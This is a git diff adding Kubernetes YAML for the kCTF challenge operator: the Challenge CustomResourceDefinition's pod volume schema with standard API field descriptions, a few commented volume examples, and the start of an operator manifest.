+                        a pre-created PVC is meant to be used by the
+                        pod, the PVC has to be updated with an owner
+                        reference to the pod once the pod exists.
+                        Normally this should not be necessary, but
+                        it may be useful when manually reconstructing
+                        a broken cluster. \n This field is read-only
+                        and no changes will be made by Kubernetes
+                        to the PVC after it has been created. \n Required,
+                        must not be nil."
+                      properties:
+                        metadata:
+                          description: May contain labels and annotations
+                            that will be copied into the PVC when
+                            creating it. No other fields are allowed
+                            and will be rejected during validation.
+                          type: object
+                        spec:
+                          description: The specification for the PersistentVolumeClaim.
+                            The entire content is copied unchanged
+                            into the PVC that gets created from this
+                            template. The same fields as in a PersistentVolumeClaim
+                            are also valid here.
+                          properties:
+                            accessModes:
+                              description: 'AccessModes contains the
+                                desired access modes the volume should
+                                have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#access-modes-1'
+                              items:
+                                type: string
+                              type: array
+                            dataSource:
+                              description: 'This field can be used
+                                to specify either: * An existing VolumeSnapshot
+                                object (snapshot.storage.k8s.io/VolumeSnapshot)
+                                * An existing PVC (PersistentVolumeClaim)
+                                If the provisioner or an external
+                                controller can support the specified
+                                data source, it will create a new
+                                volume based on the contents of the
+                                specified data source. If the AnyVolumeDataSource
+                                feature gate is enabled, this field
+                                will always have the same contents
+                                as the DataSourceRef field.'
+                              properties:
+                                apiGroup:
+                                  description: APIGroup is the group
+                                    for the resource being referenced.
+ If APIGroup is not specified, + the specified Kind must be in + the core API group. For any other + third-party types, APIGroup is + required. + type: string + kind: + description: Kind is the type of + resource being referenced + type: string + name: + description: Name is the name of + resource being referenced + type: string + required: + - kind + - name + type: object + dataSourceRef: + description: 'Specifies the object from + which to populate the volume with + data, if a non-empty volume is desired. + This may be any local object from + a non-empty API group (non core object) + or a PersistentVolumeClaim object. + When this field is specified, volume + binding will only succeed if the type + of the specified object matches some + installed volume populator or dynamic + provisioner. This field will replace + the functionality of the DataSource + field and as such if both fields are + non-empty, they must have the same + value. For backwards compatibility, + both fields (DataSource and DataSourceRef) + will be set to the same value automatically + if one of them is empty and the other + is non-empty. There are two important + differences between DataSource and + DataSourceRef: * While DataSource + only allows two specific types of + objects, DataSourceRef allows any + non-core object, as well as PersistentVolumeClaim + objects. * While DataSource ignores + disallowed values (dropping them), + DataSourceRef preserves all values, + and generates an error if a disallowed + value is specified. (Alpha) Using + this field requires the AnyVolumeDataSource + feature gate to be enabled.' + properties: + apiGroup: + description: APIGroup is the group + for the resource being referenced. + If APIGroup is not specified, + the specified Kind must be in + the core API group. For any other + third-party types, APIGroup is + required. + type: string + kind: + description: Kind is the type of + resource being referenced + type: string + name: + description: Name is the name of + resource being referenced + type: string + required: + - kind + - name + type: object + resources: + description: 'Resources represents the + minimum resources the volume should + have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#resources' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the + maximum amount of compute resources + allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes + the minimum amount of compute + resources required. If Requests + is omitted for a container, it + defaults to Limits if that is + explicitly specified, otherwise + to an implementation-defined value. + More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + selector: + description: A label query over volumes + to consider for binding. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. 
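As an illustrative sketch, the generic ephemeral volume described above is declared like this (the storage class name and size are assumptions):

volumes:
- name: scratch
  ephemeral:
    volumeClaimTemplate:
      spec:
        accessModes: ["ReadWriteOnce"]
        storageClassName: standard   # assumed class; must support dynamic provisioning
        resources:
          requests:
            storage: 1Gi             # example size; the PVC is deleted with the pod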
+ items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + storageClassName: + description: 'Name of the StorageClass + required by the claim. More info: + https://kubernetes.io/docs/concepts/storage/persistent-volumes#class-1' + type: string + volumeMode: + description: volumeMode defines what + type of volume is required by the + claim. Value of Filesystem is implied + when not included in claim spec. + type: string + volumeName: + description: VolumeName is the binding + reference to the PersistentVolume + backing this claim. + type: string + type: object + required: + - spec + type: object + type: object + fc: + description: FC represents a Fibre Channel resource + that is attached to a kubelet's host machine and + then exposed to the pod. + properties: + fsType: + description: 'Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + lun: + description: 'Optional: FC target lun number' + format: int32 + type: integer + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts.' + type: boolean + targetWWNs: + description: 'Optional: FC target worldwide + names (WWNs)' + items: + type: string + type: array + wwids: + description: 'Optional: FC volume world wide + identifiers (wwids) Either wwids or combination + of targetWWNs and lun must be set, but not + both simultaneously.' + items: + type: string + type: array + type: object + flexVolume: + description: FlexVolume represents a generic volume + resource that is provisioned/attached using an + exec based plugin. + properties: + driver: + description: Driver is the name of the driver + to use for this volume. + type: string + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + The default filesystem depends on FlexVolume + script. + type: string + options: + additionalProperties: + type: string + description: 'Optional: Extra command options + if any.' + type: object + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts.' 
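+ # Sketch of an fc volume source satisfying the schema above; the WWN and
+ # lun values are placeholders:
+ #   fc:
+ #     targetWWNs: ["500a0982991b8dc5"]
+ #     lun: 2
+ #     fsType: ext4
+ #     readOnly: true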
+ type: boolean + secretRef: + description: 'Optional: SecretRef is reference + to the secret object containing sensitive + information to pass to the plugin scripts. + This may be empty if no secret object is specified. + If the secret object contains more than one + secret, all secrets are passed to the plugin + scripts.' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + required: + - driver + type: object + flocker: + description: Flocker represents a Flocker volume + attached to a kubelet's host machine. This depends + on the Flocker control service being running + properties: + datasetName: + description: Name of the dataset stored as metadata + -> name on the dataset for Flocker should + be considered as deprecated + type: string + datasetUUID: + description: UUID of the dataset. This is unique + identifier of a Flocker dataset + type: string + type: object + gcePersistentDisk: + description: 'GCEPersistentDisk represents a GCE + Disk resource that is attached to a kubelet''s + host machine and then exposed to the pod. More + info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + properties: + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + partition: + description: 'The partition in the volume that + you want to mount. If omitted, the default + is to mount by volume name. Examples: For + volume /dev/sda1, you specify the partition + as "1". Similarly, the volume partition for + /dev/sda is "0" (or you can leave the property + empty). More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + format: int32 + type: integer + pdName: + description: 'Unique name of the PD resource + in GCE. Used to identify the disk in GCE. + More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: boolean + required: + - pdName + type: object + gitRepo: + description: 'GitRepo represents a git repository + at a particular revision. DEPRECATED: GitRepo + is deprecated. To provision a container with a + git repo, mount an EmptyDir into an InitContainer + that clones the repo using git, then mount the + EmptyDir into the Pod''s container.' + properties: + directory: + description: Target directory name. Must not + contain or start with '..'. If '.' is supplied, + the volume directory will be the git repository. Otherwise, + if specified, the volume will contain the + git repository in the subdirectory with the + given name. + type: string + repository: + description: Repository URL + type: string + revision: + description: Commit hash for the specified revision. + type: string + required: + - repository + type: object + glusterfs: + description: 'Glusterfs represents a Glusterfs mount + on the host that shares a pod''s lifetime. 
More + info: https://examples.k8s.io/volumes/glusterfs/README.md' + properties: + endpoints: + description: 'EndpointsName is the endpoint + name that details Glusterfs topology. More + info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + path: + description: 'Path is the Glusterfs volume path. + More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + readOnly: + description: 'ReadOnly here will force the Glusterfs + volume to be mounted with read-only permissions. + Defaults to false. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: boolean + required: + - endpoints + - path + type: object + hostPath: + description: 'HostPath represents a pre-existing + file or directory on the host machine that is + directly exposed to the container. This is generally + used for system agents or other privileged things + that are allowed to see the host machine. Most + containers will NOT need this. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath + --- TODO(jonesdl) We need to restrict who can + use host directory mounts and who can/can not + mount host directories as read/write.' + properties: + path: + description: 'Path of the directory on the host. + If the path is a symlink, it will follow the + link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + type: + description: 'Type for HostPath Volume. Defaults + to "". More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + required: + - path + type: object + iscsi: + description: 'ISCSI represents an ISCSI Disk resource + that is attached to a kubelet''s host machine + and then exposed to the pod. More info: https://examples.k8s.io/volumes/iscsi/README.md' + properties: + chapAuthDiscovery: + description: whether to support iSCSI Discovery + CHAP authentication + type: boolean + chapAuthSession: + description: whether to support iSCSI Session CHAP + authentication + type: boolean + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#iscsi + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + initiatorName: + description: Custom iSCSI Initiator Name. If + initiatorName is specified with iscsiInterface + simultaneously, new iSCSI interface <target portal>:<volume name> will be created for + the connection. + type: string + iqn: + description: Target iSCSI Qualified Name. + type: string + iscsiInterface: + description: iSCSI Interface Name that uses + an iSCSI transport. Defaults to 'default' + (tcp). + type: string + lun: + description: iSCSI Target Lun number. + format: int32 + type: integer + portals: + description: iSCSI Target Portal List. The portal + is either an IP or ip_addr:port if the port + is other than default (typically TCP ports + 860 and 3260). + items: + type: string + type: array + readOnly: + description: ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + type: boolean + secretRef: + description: CHAP Secret for iSCSI target and + initiator authentication + properties: + name: + description: 'Name of the referent.
More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + targetPortal: + description: iSCSI Target Portal. The Portal + is either an IP or ip_addr:port if the port + is other than default (typically TCP ports + 860 and 3260). + type: string + required: + - iqn + - lun + - targetPortal + type: object + name: + description: 'Volume''s name. Must be a DNS_LABEL + and unique within the pod. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names' + type: string + nfs: + description: 'NFS represents an NFS mount on the + host that shares a pod''s lifetime More info: + https://kubernetes.io/docs/concepts/storage/volumes#nfs' + properties: + path: + description: 'Path that is exported by the NFS + server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + readOnly: + description: 'ReadOnly here will force the NFS + export to be mounted with read-only permissions. + Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: boolean + server: + description: 'Server is the hostname or IP address + of the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + required: + - path + - server + type: object + persistentVolumeClaim: + description: 'PersistentVolumeClaimVolumeSource + represents a reference to a PersistentVolumeClaim + in the same namespace. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + properties: + claimName: + description: 'ClaimName is the name of a PersistentVolumeClaim + in the same namespace as the pod using this + volume. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + type: string + readOnly: + description: Will force the ReadOnly setting + in VolumeMounts. Default false. + type: boolean + required: + - claimName + type: object + photonPersistentDisk: + description: PhotonPersistentDisk represents a PhotonController + persistent disk attached and mounted on kubelets + host machine + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + pdID: + description: ID that identifies Photon Controller + persistent disk + type: string + required: + - pdID + type: object + portworxVolume: + description: PortworxVolume represents a portworx + volume attached and mounted on kubelets host machine + properties: + fsType: + description: FSType represents the filesystem + type to mount Must be a filesystem type supported + by the host operating system. Ex. "ext4", + "xfs". Implicitly inferred to be "ext4" if + unspecified. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + volumeID: + description: VolumeID uniquely identifies a + Portworx volume + type: string + required: + - volumeID + type: object + projected: + description: Items for all in one resources secrets, + configmaps, and downward API + properties: + defaultMode: + description: Mode bits used to set permissions + on created files by default. Must be an octal + value between 0000 and 0777 or a decimal value + between 0 and 511. 
YAML accepts both octal + and decimal values, JSON requires decimal + values for mode bits. Directories within the + path are not affected by this setting. This + might be in conflict with other options that + affect the file mode, like fsGroup, and the + result can be other mode bits set. + format: int32 + type: integer + sources: + description: list of volume projections + items: + description: Projection that may be projected + along with other supported volume types + properties: + configMap: + description: information about the configMap + data to project + properties: + items: + description: If unspecified, each + key-value pair in the Data field + of the referenced ConfigMap will + be projected into the volume as + a file whose name is the key and + content is the value. If specified, + the listed keys will be projected + into the specified paths, and unlisted + keys will not be present. If a key + is specified which is not present + in the ConfigMap, the volume setup + will error unless it is marked optional. + Paths must be relative and may not + contain the '..' path or start with + '..'. + items: + description: Maps a string key to + a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode + bits used to set permissions + on this file. Must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path + of the file to map the key + to. May not be an absolute + path. May not contain the + path element '..'. May not + start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its keys must be defined + type: boolean + type: object + downwardAPI: + description: information about the downwardAPI + data to project + properties: + items: + description: Items is a list of DownwardAPIVolume + file + items: + description: DownwardAPIVolumeFile + represents information to create + the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects + a field of the pod: only annotations, + labels, name and namespace + are supported.' + properties: + apiVersion: + description: Version of + the schema the FieldPath + is written in terms of, + defaults to "v1". + type: string + fieldPath: + description: Path of the + field to select in the + specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode + bits used to set permissions + on this file, must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' 
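+ # Example projected volume combining the configMap and downwardAPI sources
+ # described here (the ConfigMap name and keys are hypothetical):
+ #   projected:
+ #     defaultMode: 0444
+ #     sources:
+ #     - configMap:
+ #         name: app-config
+ #         items:
+ #         - key: config.json
+ #           path: config.json
+ #     - downwardAPI:
+ #         items:
+ #         - path: labels
+ #           fieldRef:
+ #             fieldPath: metadata.labels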
+ format: int32 + type: integer + path: + description: 'Required: Path + is the relative path name + of the file to be created. + Must not be absolute or contain + the ''..'' path. Must be utf-8 + encoded. The first item of + the relative path must not + start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource + of the container: only resources + limits and requests (limits.cpu, + limits.memory, requests.cpu + and requests.memory) are currently + supported.' + properties: + containerName: + description: 'Container + name: required for volumes, + optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the + output format of the exposed + resources, defaults to + "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: + resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + secret: + description: information about the secret + data to project + properties: + items: + description: If unspecified, each + key-value pair in the Data field + of the referenced Secret will be + projected into the volume as a file + whose name is the key and content + is the value. If specified, the + listed keys will be projected into + the specified paths, and unlisted + keys will not be present. If a key + is specified which is not present + in the Secret, the volume setup + will error unless it is marked optional. + Paths must be relative and may not + contain the '..' path or start with + '..'. + items: + description: Maps a string key to + a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode + bits used to set permissions + on this file. Must be an octal + value between 0000 and 0777 + or a decimal value between + 0 and 511. YAML accepts both + octal and decimal values, + JSON requires decimal values + for mode bits. If not specified, + the volume defaultMode will + be used. This might be in + conflict with other options + that affect the file mode, + like fsGroup, and the result + can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path + of the file to map the key + to. May not be an absolute + path. May not contain the + path element '..'. May not + start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + type: object + serviceAccountToken: + description: information about the serviceAccountToken + data to project + properties: + audience: + description: Audience is the intended + audience of the token. A recipient + of a token must identify itself + with an identifier specified in + the audience of the token, and otherwise + should reject the token. The audience + defaults to the identifier of the + apiserver. + type: string + expirationSeconds: + description: ExpirationSeconds is + the requested duration of validity + of the service account token. 
As + the token approaches expiration, + the kubelet volume plugin will proactively + rotate the service account token. + The kubelet will start trying to + rotate the token if the token is + older than 80 percent of its time + to live or if the token is older + than 24 hours. Defaults to 1 hour + and must be at least 10 minutes. + format: int64 + type: integer + path: + description: Path is the path relative + to the mount point of the file to + project the token into. + type: string + required: + - path + type: object + type: object + type: array + type: object + quobyte: + description: Quobyte represents a Quobyte mount + on the host that shares a pod's lifetime + properties: + group: + description: Group to map volume access to. Default + is no group + type: string + readOnly: + description: ReadOnly here will force the Quobyte + volume to be mounted with read-only permissions. + Defaults to false. + type: boolean + registry: + description: Registry represents a single or + multiple Quobyte Registry services specified + as a string as host:port pair (multiple entries + are separated with commas) which acts as the + central registry for volumes + type: string + tenant: + description: Tenant owning the given Quobyte + volume in the Backend. Used with dynamically + provisioned Quobyte volumes, value is set + by the plugin + type: string + user: + description: User to map volume access to. Defaults + to serviceaccount user + type: string + volume: + description: Volume is a string that references + an already created Quobyte volume by name. + type: string + required: + - registry + - volume + type: object + rbd: + description: 'RBD represents a Rados Block Device + mount on the host that shares a pod''s lifetime. + More info: https://examples.k8s.io/volumes/rbd/README.md' + properties: + fsType: + description: 'Filesystem type of the volume + that you want to mount. Tip: Ensure that the + filesystem type is supported by the host operating + system. Examples: "ext4", "xfs", "ntfs". Implicitly + inferred to be "ext4" if unspecified. More + info: https://kubernetes.io/docs/concepts/storage/volumes#rbd + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + image: + description: 'The rados image name. More info: + https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + keyring: + description: 'Keyring is the path to key ring + for RBDUser. Default is /etc/ceph/keyring. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + monitors: + description: 'A collection of Ceph monitors. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + items: + type: string + type: array + pool: + description: 'The rados pool name. Default is + rbd. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly + setting in VolumeMounts. Defaults to false. + More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: boolean + secretRef: + description: 'SecretRef is name of the authentication + secret for RBDUser. If provided overrides + keyring. Default is nil. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?'
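+ # Sketch of an rbd volume source matching these fields; monitor address,
+ # pool, image and secret name are placeholders:
+ #   rbd:
+ #     monitors: ["10.16.154.78:6789"]
+ #     pool: kube
+ #     image: foo
+ #     user: admin
+ #     secretRef:
+ #       name: ceph-secret
+ #     fsType: ext4
+ #     readOnly: true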
+ type: string + type: object + user: + description: 'The rados user name. Default is + admin. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + required: + - image + - monitors + type: object + scaleIO: + description: ScaleIO represents a ScaleIO persistent + volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Default is "xfs". + type: string + gateway: + description: The host address of the ScaleIO + API Gateway. + type: string + protectionDomain: + description: The name of the ScaleIO Protection + Domain for the configured storage. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretRef: + description: SecretRef references to the secret + for ScaleIO user and other sensitive information. + If this is not provided, Login operation will + fail. + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + sslEnabled: + description: Flag to enable/disable SSL communication + with Gateway, default false + type: boolean + storageMode: + description: Indicates whether the storage for + a volume should be ThickProvisioned or ThinProvisioned. + Default is ThinProvisioned. + type: string + storagePool: + description: The ScaleIO Storage Pool associated + with the protection domain. + type: string + system: + description: The name of the storage system + as configured in ScaleIO. + type: string + volumeName: + description: The name of a volume already created + in the ScaleIO system that is associated with + this volume source. + type: string + required: + - gateway + - secretRef + - system + type: object + secret: + description: 'Secret represents a secret that should + populate this volume. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + properties: + defaultMode: + description: 'Optional: mode bits used to set + permissions on created files by default. Must + be an octal value between 0000 and 0777 or + a decimal value between 0 and 511. YAML accepts + both octal and decimal values, JSON requires + decimal values for mode bits. Defaults to + 0644. Directories within the path are not + affected by this setting. This might be in + conflict with other options that affect the + file mode, like fsGroup, and the result can + be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value + pair in the Data field of the referenced Secret + will be projected into the volume as a file + whose name is the key and content is the value. + If specified, the listed keys will be projected + into the specified paths, and unlisted keys + will not be present. If a key is specified + which is not present in the Secret, the volume + setup will error unless it is marked optional. + Paths must be relative and may not contain + the '..' path or start with '..'. + items: + description: Maps a string key to a path within + a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used + to set permissions on this file. 
Must + be an octal value between 0000 and 0777 + or a decimal value between 0 and 511. + YAML accepts both octal and decimal + values, JSON requires decimal values + for mode bits. If not specified, the + volume defaultMode will be used. This + might be in conflict with other options + that affect the file mode, like fsGroup, + and the result can be other mode bits + set.' + format: int32 + type: integer + path: + description: The relative path of the + file to map the key to. May not be an + absolute path. May not contain the path + element '..'. May not start with the + string '..'. + type: string + required: + - key + - path + type: object + type: array + optional: + description: Specify whether the Secret or its + keys must be defined + type: boolean + secretName: + description: 'Name of the secret in the pod''s + namespace to use. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + type: string + type: object + storageos: + description: StorageOS represents a StorageOS volume + attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretRef: + description: SecretRef specifies the secret + to use for obtaining the StorageOS API credentials. If + not specified, default values will be attempted. + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + volumeName: + description: VolumeName is the human-readable + name of the StorageOS volume. Volume names + are only unique within a namespace. + type: string + volumeNamespace: + description: VolumeNamespace specifies the scope + of the volume within StorageOS. If no namespace + is specified then the Pod's namespace will + be used. This allows the Kubernetes name + scoping to be mirrored within StorageOS for + tighter integration. Set VolumeName to any + name to override the default behaviour. Set + to "default" if you are not using namespaces + within StorageOS. Namespaces that do not pre-exist + within StorageOS will be created. + type: string + type: object + vsphereVolume: + description: VsphereVolume represents a vSphere + volume attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + storagePolicyID: + description: Storage Policy Based Management + (SPBM) profile ID associated with the StoragePolicyName. + type: string + storagePolicyName: + description: Storage Policy Based Management + (SPBM) profile name. 
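+ # Example secret volume projecting a single key with restrictive mode bits
+ # (secret and key names are hypothetical):
+ #   secret:
+ #     secretName: tls-certs
+ #     defaultMode: 0400
+ #     items:
+ #     - key: tls.key
+ #       path: private/tls.key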
+ type: string + volumePath: + description: Path that identifies vSphere volume + vmdk + type: string + required: + - volumePath + type: object + required: + - name + type: object + type: array + required: + - containers + type: object + type: object + type: object + powDifficultySeconds: + default: 0 + description: The quantity of seconds of the proof of work + type: integer + replicas: + default: 1 + description: The desired quantity of replicas if horizontal pod autoscaler + is disabled + format: int32 + type: integer + required: + - image + type: object + status: + description: ChallengeStatus defines the observed state of Challenge + properties: + health: + default: disabled + description: Shows healthcheck returns + type: string + status: + default: up-to-date + description: 'Important: Run "operator-sdk generate k8s" to regenerate + code after modifying this file Add custom validation using kubebuilder + tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html + Says if the challenge is up to date or being updated' + type: string + required: + - health + - status + type: object + type: object + served: true + storage: true + subresources: + status: {} +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] diff --git a/v8ctf/kctf/resources/operator.yaml b/v8ctf/kctf/resources/operator.yaml new file mode 100644 index 00000000..7933bbcd --- /dev/null +++ b/v8ctf/kctf/resources/operator.yaml @@ -0,0 +1,4573 @@ +apiVersion: v1 +kind: Namespace +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-system +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: v0.7.0 + creationTimestamp: null + name: challenges.kctf.dev +spec: + group: kctf.dev + names: + kind: Challenge + listKind: ChallengeList + plural: challenges + singular: challenge + scope: Namespaced + versions: + - additionalPrinterColumns: + - jsonPath: .status.health + name: Health + type: string + - jsonPath: .status.status + name: Status + type: string + - jsonPath: .spec.deployed + name: Deployed + type: boolean + - jsonPath: .spec.network.public + name: Public + type: boolean + name: v1 + schema: + openAPIV3Schema: + description: Challenge is the Schema for the challenges API + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. 
